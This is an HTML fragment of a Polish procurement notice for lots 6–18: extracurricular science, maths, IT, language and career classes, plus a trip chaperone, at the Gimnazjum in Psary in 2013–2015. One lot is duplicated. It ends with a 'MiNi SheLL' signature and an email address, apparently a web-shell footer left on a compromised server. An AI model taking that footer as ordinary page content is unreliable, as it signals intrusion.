współudział w zorganizowaniu szkolnego konkursu przyrodniczego ( z treści biologii) na koniec każdego roku szkolnego, analiza kart udziału w konkursach, przedstawienie wyników konkursów w ramach podsumowania zajęć na koniec każdego roku szkolnego,
przeprowadzenia testów kompetencji wśród uczniów na koniec każdego roku szkolnego,
udział w wyjazdach na zajęcia organizowane przez Uniwersytet Śląski, 
wykorzystanie szkolnej platformy e-learningowej w prowadzeniu zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ZADANIE NR 3.  Organizacja autorskiego programu zajęć matematyczno-przyrodniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 6
Prowadzenie zajęć rozwijających Osobliwości świata przyrody z zakresu fizyki oparte na wykonywaniu doświadczeń, prowadzeniu badań i eksperymentów w kl. I-III w Gimnazjum w Psarach w 3 grupach zajęciowych, z której każda z nich będzie miała 1 godzinę co 3 tygodnie tj.58 godzin zajęć w dwóch latach szkolnych 2013/2014 i 2014/2015r
Wykonawca będzie zobowiązany do
opracowania autorskiego programu z zakresu fizyki, wchodzącego w skład programu zajęć Osobliwości świata przyrody, w którym zostaną ujęte zajęcia wyjazdowe organizowane przez Uniwersytet Śląski,
prowadzenia zajęć z zakresu fizyki Osobliwości świata przyrody w oparciu o autorski program,
prowadzenia dzienników zajęć,
prowadzenia kart obserwacji uczniów i przedstawienia ich wyników na koniec każdego roku szkolnego,
przeprowadzenie ankiet wśród rodziców uczniów uczęszczających na zajęcia,
współudział w zorganizowaniu szkolnego konkursu przyrodniczego ( z treści fizyki) na koniec każdego roku szkolnego, analiza kart udziału w konkursach, przedstawienie wyników konkursów w ramach podsumowania zajęć na koniec każdego roku szkolnego,
przeprowadzenia testów kompetencji wśród uczniów na koniec każdego roku szkolnego,
udział w wyjazdach na zajęcia organizowane przez Uniwersytet Śląski, 
wykorzystanie szkolnej platformy e-learningowej w prowadzeniu zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> ZADANIE NR 3.  Organizacja autorskiego programu zajęć matematyczno-przyrodniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr  7
Prowadzenie zajęć rozwijających Osobliwości świata przyrody z zakresu chemii oparte na wykonywaniu doświadczeń, prowadzeniu badań i eksperymentów w kl. I-III w Gimnazjum w Psarach w 3 grupach zajęciowych, z której każda z nich będzie miała 1 godzinę co 3 tygodnie tj.58 godzin zajęć w dwóch latach szkolnych 2013/2014 i 2014/2015r. 
Wykonawca będzie zobowiązany do
opracowania autorskiego programu z zakresu chemii, wchodzącego w skład programu zajęć Osobliwości świata przyrody, w którym zostaną ujęte zajęcia wyjazdowe organizowane przez Uniwersytet Śląski,
prowadzenia zajęć z zakresu chemii Osobliwości świata przyrody w oparciu o autorski program,
prowadzenia dzienników zajęć,
prowadzenia kart obserwacji uczniów i przedstawienia ich wyników na koniec każdego roku szkolnego,
przeprowadzenie ankiet wśród rodziców uczniów uczęszczających na zajęcia,
współudział w zorganizowaniu szkolnego konkursu przyrodniczego ( z treści chemii) na koniec każdego roku szkolnego, analiza kart udziału w konkursach, przedstawienie wyników konkursów w ramach podsumowania zajęć na koniec każdego roku szkolnego,
przeprowadzenia testów kompetencji wśród uczniów na koniec każdego roku szkolnego,
udział w wyjazdach na zajęcia organizowane przez Uniwersytet Śląski, 
wykorzystanie szkolnej platformy e-learningowej w prowadzeniu zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> ZADANIE NR 3.  Organizacja autorskiego programu zajęć matematyczno-przyrodniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 8
Prowadzenie zajęć rozwijających Matematyka po angielsku w ramach nauczania zintegrowanego językowo-przedmiotowego w kl. I-III w Gimnazjum w Psarach w 2, grupach zajęciowych, z których każda będzie miała 1 godzinę na tydzień tj. 116 godzin zajęć. w dwóch latach szkolnych 2013/2014 i 2014/2015
Wykonawca będzie zobowiązany do
opracowania autorskiego programu nauczania matematyki i języka angielskiego,
prowadzenia zajęć w oparciu o autorski program, 
prowadzenia dzienników zajęć,
prowadzenia kart obserwacji uczniów i przedstawienia ich wyników na koniec każdego roku szkolnego,
udział w przeprowadzeniu ankiet wśród rodziców uczniów uczęszczających na zajęcia,
współudział w zorganizowaniu szkolnego konkursu matematycznego na koniec każdego roku szkolnego, analiza kart udziału w konkursach, przedstawienie wyników konkursów w ramach podsumowania zajęć na koniec każdego roku szkolnego.
przeprowadzenia testów kompetencji wśród uczniów na koniec każdego roku szkolnego,
wykorzystanie szkolnej platformy e-learningowej w prowadzeniu zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> ZADANIE NR 3.  Organizacja autorskiego programu zajęć matematyczno-przyrodniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr  9
Prowadzenie zajęć rozwijających Bliżej rzeczywistości - krok w świat ekonomii w oparciu o program autorski w kl. I-III w Gimnazjum w Psarach w 1 grupie zajęciowej, która będzie miała 1 godzinę na tydzień tj. 58 godzin zajęć w dwóch latach szkolnych 2013/2014 i 2014/2015 
Wykonawca będzie zobowiązany do:
prowadzenia dzienników zajęć,
opracowania autorskiego programu nauczania z wykorzystaniem matematyki do zagadnień  ekonomii, w którym zostaną ujęte zajęcia wyjazdowe do Urzędu Skarbowego i do Banku,
prowadzenia zajęć Bliżej rzeczywistości - krok w świat ekonomii, w oparciu o autorski program nauczania,
prowadzenia kart obserwacji uczniów i przedstawienia ich wyników na koniec każdego roku szkolnego,
udział w przeprowadzeniu ankiet wśród rodziców uczniów uczęszczających na zajęcia, 
współudział w zorganizowaniu szkolnego konkursu matematycznego na koniec każdego roku szkolnego, analiza kart udziału w konkursach, przedstawienie wyników konkursów w ramach podsumowania zajęć na koniec każdego roku szkolnego.
przeprowadzenia testów kompetencji wśród uczniów na koniec każdego roku szkolnego,
wykorzystanie szkolnej platformy e-learningowej w prowadzeniu zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> ZADANIE NR 3.  Organizacja autorskiego programu zajęć matematyczno-przyrodniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 10
Prowadzenie zajęć wyrównawczych z matematyki dla uczniów klas I-III w Gimnazjum w Psarach realizowane w 3 grupach zajęciowych, z których każda będzie miała 1 godzinę zajęć na tydzień tj. 174 godzin zajęć w dwóch latach szkolnych 2013/2014 i 2014/2015,.
Wykonawca będzie zobowiązany do:
opracowania programu zajęć,
prowadzenia zajęć w oparciu o program,
prowadzenia dzienników zajęć,
prowadzenia kart obserwacji uczniów i przedstawienia ich wyników na koniec każdego roku szkolnego,
udział w przeprowadzeniu ankiet wśród rodziców uczniów uczęszczających na zajęcia,
przeprowadzenia testów kompetencji wśród uczniów na koniec każdego roku szkolnego,
wykorzystanie szkolnej platformy e-learningowej w prowadzeniu zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> ZADANIE NR 3.  Organizacja autorskiego programu zajęć matematyczno-przyrodniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 10
Prowadzenie zajęć wyrównawczych z matematyki dla uczniów klas I-III w Gimnazjum w Psarach realizowane w 3 grupach zajęciowych, z których każda będzie miała 1 godzinę zajęć na tydzień tj. 174 godzin zajęć w dwóch latach szkolnych 2013/2014 i 2014/2015,.
Wykonawca będzie zobowiązany do:
opracowania programu zajęć,
prowadzenia zajęć w oparciu o program,
prowadzenia dzienników zajęć,
prowadzenia kart obserwacji uczniów i przedstawienia ich wyników na koniec każdego roku szkolnego,
udział w przeprowadzeniu ankiet wśród rodziców uczniów uczęszczających na zajęcia,
przeprowadzenia testów kompetencji wśród uczniów na koniec każdego roku szkolnego,
wykorzystanie szkolnej platformy e-learningowej w prowadzeniu zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> ZADANIE NR 3.  Organizacja autorskiego programu zajęć matematyczno-przyrodniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 11
Prowadzenie zajęć wyrównawczych z matematyki dla uczniów klas I-III w Gimnazjum w Psarach realizowane w 3 grupach zajęciowych, z których każda będzie miała 1 godzinę na tydzień tj. 174 godzin zajęć w dwóch latach szkolnych 2013/2014 i 2014/2015,.
Wykonawca będzie zobowiązany do:
opracowania programu zajęć,
prowadzenia zajęć w oparciu o program, 
prowadzenia dzienników zajęć,
prowadzenia kart obserwacji uczniów i przedstawienia ich wyników na koniec każdego roku szkolnego,
udział w przeprowadzeniu ankiet wśród rodziców uczniów uczęszczających na zajęcia,
przeprowadzenia testów kompetencji wśród uczniów na koniec każdego roku szkolnego,
wykorzystanie szkolnej platformy e-learningowej w prowadzeniu zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> ZADANIE NR 4.  Organizacja zajęć informatycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 12
Prowadzenie zajęć rozwijających z informatyki dla uczniów klas I-III w Gimnazjum w Psarach realizowane w oparciu o program autorski z uwzględnieniem zagadnień z programowania i robotyki  w 2 grupach zajęciowych, z której każda będzie miała 2 godziny co drugi tydzień tj. 116 godzin zajęć w dwóch latach szkolnych 2013/2014 i 2014/2015,
Wykonawca będzie zobowiązany do:
opracowania autorskiego programu z informatyki,
prowadzenia zajęć w oparciu o autorski program nauczania z informatyki
prowadzenia dzienników zajęć,
prowadzenia kart obserwacji uczniów i przedstawienia ich wyników na koniec każdego roku szkolnego,
udział w przeprowadzeniu ankiet wśród rodziców uczniów uczęszczających na zajęcia, oraz przedstawienie wyników z badania ankietowego na koniec każdego roku szkolnego,
przeprowadzenia testów kompetencji wśród uczniów na koniec każdego roku szkolnego,
wykorzystanie szkolnej platformy e-learningowej w prowadzeniu zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> ZADANIE NR 4.  Organizacja zajęć informatycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 13
Prowadzenie zajęć komputerowych Od fotografii do filmu dla uczniów klas I-III poszerzające u uczniów umiejętności z obsługi narzędzi do obróbki grafiki i tworzenia krótkich filmów odbywające się w Gimnazjum w Psarach w 1 grupie zajęciowej co drugi tydzień tj. 58 godzin zajęć w dwóch latach szkolnych 2013/2014 i 2014/2015, 
Wykonawca będzie zobowiązany do:
opracowania programu zajęć w którym zostanie ujęty wyjazd do Studia Filmów Rysunkowych w Bielsku Białej, 
prowadzenia zajęć w oparciu o program, 
prowadzenia dzienników zajęć,
prowadzenia kart obserwacji uczniów i przedstawienia ich wyników na koniec każdego roku szkolnego,
udział w przeprowadzeniu ankiet wśród rodziców uczniów uczęszczających na zajęcia, oraz przedstawienie wyników z badania ankietowego na koniec każdego roku szkolnego,
przeprowadzenia testów kompetencji wśród uczniów na koniec każdego roku szkolnego,
udział w wyjeździe do Studia Filmów Rysunkowych w Bielsku Białej,
zorganizowanie festiwalu filmików oraz wystawy fotografii w szkolnej bibliotece i Gminnym Ośrodku Kultury,
wykorzystanie szkolnej platformy e-learningowej w prowadzeniu zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> ZADANIE NR 5.  Organizacja zajęć językowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 14
Prowadzenie zajęć wyrównawczych z języka angielskiego w Gimnazjum w Psarach realizowane 1 grupie zajęciowej 1 raz w tygodniu tj. 58 godzin zajęć w dwóch latach szkolnych 2013/2014 i 2014/2015,
Wykonawca będzie zobowiązany do
opracowania programu zajęć,
prowadzenia zajęć w oparciu o program, 
prowadzenia dzienników zajęć,
prowadzenia kart obserwacji uczniów i przedstawienia ich wyników na koniec każdego roku szkolnego,
udział w przeprowadzeniu ankiet wśród rodziców uczniów uczęszczających na zajęcia,
przeprowadzenia testów kompetencji wśród uczniów na koniec każdego roku szkolnego,
wykorzystanie szkolnej platformy e-learningowej w prowadzeniu zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> ZADANIE NR 5.  Organizacja zajęć językowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 15
Zajęcia wyrównawcze z języka angielskiego w Gimnazjum w Psarach realizowane 1 grupie zajęciowej 1 raz w tygodniu tj. 58 godzin zajęć w dwóch latach szkolnych 2013/2014 i 2014/2015,
Wykonawca będzie zobowiązany do
opracowania programu zajęć,
prowadzenia zajęć w oparciu o program, 
prowadzenia dzienników zajęć,
prowadzenia kart obserwacji uczniów i przedstawienia ich wyników na koniec każdego roku szkolnego,
udział w przeprowadzeniu ankiet wśród rodziców uczniów uczęszczających na zajęcia, 
przeprowadzenia testów kompetencji wśród uczniów na koniec każdego roku szkolnego,
wykorzystanie szkolnej platformy e-learningowej w prowadzeniu zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> ZADANIE NR 5.  Organizacja zajęć językowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 16
Prowadzenie zajęć wyrównawczych z języka angielskiego realizowane w Gimnazjum w Psarach w 1 grupie zajęciowej 1 raz w tygodniu tj. 58 godzin zajęć w dwóch latach szkolnych 2013/2014 i 2014/2015,
Wykonawca będzie zobowiązany do
opracowania programu zajęć,
prowadzenia zajęć w oparciu o program, 
prowadzenia dzienników zajęć,
prowadzenia kart obserwacji uczniów i przedstawienia ich wyników na koniec każdego roku szkolnego,
udział w przeprowadzeniu ankiet wśród rodziców uczniów uczęszczających na zajęcia, 
przeprowadzenia testów kompetencji wśród uczniów na koniec każdego roku szkolnego,
wykorzystanie szkolnej platformy e-learningowej w prowadzeniu zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> ZADANIE NR 6.  Organizacja Szkolnego Centrum Doradztwa Zawodowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 17
Prowadzenie zajęć dla uczniów klas II-III dotyczące rynku pracy m.in. sposobów autoprezentacji, zasad tworzenia dokumentów aplikacyjnych, przedsiębiorczości i edukacji konsumenckiej w Gimnazjum w Psarach w 2 grupach zajęciowych 2 razy w miesiącu po 3 godziny tj. 180 godzin 
Wykonawca będzie zobowiązany do
prowadzenia dzienników zajęć,
opracowania i przeprowadzenia ankiet wśród rodziców uczniów uczęszczających na zajęcia, oraz przedstawienie wyników z badania ankietowego na koniec każdego roku szkolnego,
wykorzystanie platformy e-learningowej w prowadzeniu zajęć,
raport z analizy losów absolwentów - na koniec każdego roku szkolnego,
udział w wyjazdach ( po 7 w każdym roku szkolnym) w celu poznania lokalnego rynku do
1. Elektrownia Łagisza i Centrum Logistyczne
2. Lotnisko
3. Urząd Gminy i Bank Spółdzielczy w Psarach
4. PUP, Policja, Straż Pożarna w Będzinie
5.Targi Pracy w Katowicach
6. Kombinat Ogrodniczy w Malinowicach
7. Radio Katowice.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> ZADANIE NR.7.  Opiekun dzieci na zajęcia wyjazdowe w ramach zadania 2,3,4 i 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 18
Opiekun dzieci na zajęcia wyjazdowe organizowane w Gimnazjum w Psarach w trakcie roku szkolnego 2013/2014 i 2014/2015
Usługa obejmuje opiekę w trakcie dowozu, odwozu oraz pobytu uczestników w miejscu docelowym 
25 wyjazdów tj. 78 godzin zegarowych. Wycieczki zaplanowano do następujących miejsc
4 wyjazdy po 3 godz. na zajęcia warsztatowe w redakcjach=12godz,
4 wyjazdy po 3 godz. na zajęcia organizowane przez Uniwersytet Śląski=12godz,
2 wyjazdy po 2 godz. do Banku i Urzędu Skarbowego=4godz,
1 wyjazd 8 godzinny do Studia Filmów Rysunkowych= 8godz,
14 wyjazdów =42 godz,
do:
Elektrowni Łagisza, Centrum Logistycznego,
Lotniska, 
Urzędu Gminy, Banku Spółdzielczego w Psarach, 
Powiatowego Urzędu Pracy, Policji, Straży Pożarnej w Będzinie,
Targi Pracy w Katowicach,
Kombinat Ogrodniczy w Malinowicach
Radio Katowice.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com